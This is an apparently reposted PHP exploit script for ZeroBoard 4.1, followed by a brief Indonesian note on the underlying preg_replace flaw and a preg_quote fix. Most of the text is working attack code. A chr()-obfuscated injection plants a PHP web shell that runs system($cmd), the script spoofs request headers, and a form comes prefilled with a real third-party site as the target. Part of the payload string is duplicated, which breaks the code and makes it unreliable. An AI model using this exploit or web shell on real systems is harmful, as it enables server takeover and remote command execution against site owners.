[PHP] POC + Exploit Zeroboard 4.1
author : fix
source : http://75n1.blogspot.co.id/2015/09/cookie-stealing-over-sql-injection.html

<?php
/**
* @author Jei.Friee
* @copyright 2012
*
* ZeroBoard 4.1 Exploit
*/
error_reporting(0);
$str = 'REMOTE_ADDR=*/fputs(fopen(chr(46).chr(47)
.chr(97).chr(110).chr(97).chr(115).chr(107).chr(105).chr(46).chr(112).chr
(104).chr(112),chr(119).chr(43)),chr(60).
chr(63).chr(32).chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).
chr(36).chr(99).chr(109).c
hr(100).chr(41).chr(59).chr(32).chr(63).chr(62));/*&
HTTP_SESSION_VARS[zb_last_connect_check]=a&HTTP_SERVER_VARS=
1&HTTP_ENV_VARS=1';
.chr(97).chr(110).chr(97).chr(115).chr(107).chr(105).chr(46).chr(112).chr
(104).chr(112),chr(119).chr(43)),chr(60).
chr(63).chr(32).chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).
chr(36).chr(99).chr(109).c
hr(100).chr(41).chr(59).chr(32).chr(63).chr(62));/*&
HTTP_SESSION_VARS[zb_last_connect_check]=a&HTTP_SERVER_VARS=
1&HTTP_ENV_VARS=1';
$uri_victim = $_GET['victim'].'/lib.php?'.$str;
$uri_playload = $_GET['victim'].'/data/now_connect.php';
$uri_shell = $_GET['victim'].'/data/shell.php';
if(isset($_GET['victim'])) {
@file_get_contents($uri_victim.'?'.$str);
@file_get_contents($_GET['victim'].'/data/now_connect.php');
echo "".$uri_shell."";
$host = @parse_url($_GET['victim'],PHP_URL_HOST);
//echo $host;
$fp = @fsockopen($host,'80',$errno,$errstr,20);
if($fp) {
$msg = null;
fputs($fp,"POST $uri_victim HTTP/1.1\r\n");
fputs($fp,"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n");
fputs($fp,"Referer: $uri_victim\r\n");
fputs($fp,"Accept-Language: zh-cn\r\n");
fputs($fp,"Content-Type: application/x-www-form-urlencoded\r\n");
fputs($fp,"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)\r\n");
fputs($fp,"CLIENT-IP: 127.0.0.1\r\n");
fputs($fp,"X-FORWARDED-FOR: 127.0.0.1\r\n");
fputs($fp,"Host: $host\r\n");
fputs($fp,"Content-Length: ".strlen($msg)."\r\n");
fputs($fp,"Connection: Keep-Alive\r\n");
fputs($fp,"Cache-Control: no-cache\r\n");
fputs($fp,"Cookie: $cookie\r\n");
fputs($fp,"\r\n");
fputs($fp,$msg."\r\n");
fputs($fp,"GET $uri_victim HTTP/1.1\r\n");
fputs($fp,"Host: $host\r\n");
fputs($fp,"Accept: */*\r\n");
fputs($fp,"Referer: $uri_victim\r\n");
fputs($fp,"User-Agent: Lamerz\r\n");
fputs($fp,"CLIENT-IP: 127.0.0.1\r\n");
fputs($fp,"X-FORWARDED-FOR: 127.0.0.1\r\n");
fputs($fp,"Pragma: no-cache\r\n");
fputs($fp,"Cache-Control: no-cache\r\n");
fputs($fp,"Connection: Close\r\n\r\n");
}
while($fp && !feof($fp)) {
$res[] = fread($fp,1024);
}
}
?>
<form method="get" action="" >
<input type="text" name="victim" size="25" value="http://leeminhothailand.com/board/" />
<input type="submit" value="Excute" name="exp" />
</form>
<pre>
<?php
print_r($res);
?>
</pre>
kesalahannya terdapat pada preg_replace() include/list_check.php baris 105/106
$keyword_pattern = "/([^<]*)$keyword([^>]*)/i" ;
$memo = preg_replace ( $keyword_pattern , "\\1<font color=FF001E style=background-color:FFF000;>$keyword</font>\\2" , $memo );
seperti yg di atas bbrpa syntax "<?php" tidak di filter
untuk memperbaikinya bisa menambahkan
fungsi preg_quote()
$keyword_pattern = "/([^<]*)preg_quote($keyword, "/")([^>]*)/i" ;
mngkin saya kurang bisa jelasin untuk lebih jelasnya bsa di cek di web http://pandora.sapzil.info/text/notify/20050123.zb41advisory.php
./CMIIW
Disclaimer: gambar, artikel ataupun video yang ada di web ini terkadang berasal dari berbagai sumber media lain. Hak Cipta sepenuhnya dipegang oleh sumber tersebut. Jika ada masalah terkait hal ini, Anda dapat menghubungi kami di halaman ini.